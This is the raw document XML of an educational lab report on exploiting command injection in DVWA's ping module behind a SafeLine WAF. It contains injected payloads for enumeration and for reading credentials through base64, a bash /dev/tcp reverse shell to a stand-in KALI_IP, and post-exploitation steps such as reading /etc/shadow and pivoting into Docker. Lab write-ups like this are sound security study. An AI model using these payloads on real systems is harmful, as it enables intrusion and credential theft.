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1A2E"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Command Injection Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DVWA Attack Lab | SafeLine WAF | Kali Linux vs Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Lab Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The following virtual lab was configured to practice web application security testing using command injection attacks against a vulnerable web application.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t>Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Kali Linux — IP: 192.168.100.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Target Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ubuntu — IP: 192.168.100.19 (running DVWA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SafeLine Firewall — IP: 192.168.0.1 (Docker-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Vulnerable App</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Network Architecture: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Kali Linux (Attacker)</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">   SafeLine WAF  &lt;-- Monitors/filters traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t>Ubuntu + DVWA (Target)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Attack Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploit the Command Injection vulnerability in DVWA's "Ping a Device" module to achieve Remote Code Execution (RCE) on the Ubuntu server. The input field executes OS ping commands without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The vulnerable PHP code runs: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shell_exec("ping -c 4 " . $_GET['ip']);</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. Step-by-Step Attack Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 1 — Confirm Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Entered the following payload in the IP address field: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127.0.0.1; whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Result: Output showed "www-data" — confirming the server executes injected commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This means the application is vulnerable and we have Remote Code Execution (RCE).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 2 — System Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ran the following payload to gather system information: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127.0.0.1; id; uname -a; hostname; ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Results obtained: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Info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User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>www-data (uid=33, gid=33)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bushra-VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ubuntu Linux — Kernel 7.0.0-14-generic x86_64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Main IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>192.168.100.19 (enp0s3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Docker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>172.17.0.1 (docker0) — Docker is running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SafeLine IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>192.168.0.1 (safeline-ce interface)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 3 — File System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Since the attacker does not know the file paths initially, the following commands were used to discover them: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127.0.0.1; ls /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This revealed the web root structure including folders: config, dvwa, database, hackable, docs.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>To find the exact config file path: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127.0.0.1; find /var/www/html -name "*.php" -path "*/config/*" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Result: Exact path of config.inc.php discovered.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 4 — Credential Extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Direct cat command was attempted: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127.0.0.1; cat /var/www/html/dvwa/config/config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>When output was not visible directly, base64 encoding was used to bypass output filtering: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C0392B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>127.0.0.1; base64 /var/www/html/dvwa/config/config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The base64 encoded output was then decoded to reveal database credentials (MySQL username and password).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. Key Payloads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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confirm RCE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whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>System Info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id; uname -a; hostname; ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>List Web Root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ls /var/www/html/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Find Config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find /var/www/html -name "*.php" -path "*/config/*" 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Read File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cat /var/www/html/dvwa/config/config.inc.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Base64 Encode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base64 /var/www/html/dvwa/config/config.inc.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4392"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reverse Shell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0392B"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>127.0.0.1; bash -i &gt;&amp; /dev/tcp/KALI_IP/4444 0&gt;&amp;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5. SafeLine WAF Observations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SafeLine WAF was running as a Docker container on the Ubuntu machine (192.168.0.1). Key observations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Basic payloads with semicolons (;) were able to pass through in Low security mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SafeLine dashboard can be monitored to observe which payloads are flagged vs allowed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>WAF evasion techniques such as base64 encoding, URL encoding (%3B), and pipe operators (|) can be tested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Docker interface (172.17.0.1) discovered — internal Docker network is exposed.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Next Steps / Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Establish a reverse shell: nc -lvnp 4444 on Kali, then bash -i payload on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Stabilize shell with: python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Check sudo privileges: sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Find SUID binaries for privilege escalation: find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Access /etc/shadow for password hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Pivot to Docker network (172.17.0.1) for further internal network attacks</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A5C96"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Command injection is possible when user input is passed directly to OS shell functions without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Even www-data level access can lead to full system compromise through file reading and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Real attackers use systematic enumeration (ls, ps aux, find) to discover paths without prior knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Base64 encoding is a useful technique to read files when direct output is filtered or truncated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Docker environments may expose additional attack surfaces through internal network interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>WAF alone is not sufficient — application-level input sanitization is essential.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>This report documents a controlled lab exercise for educational purposes only. All attacks were performed in an isolated virtual environment.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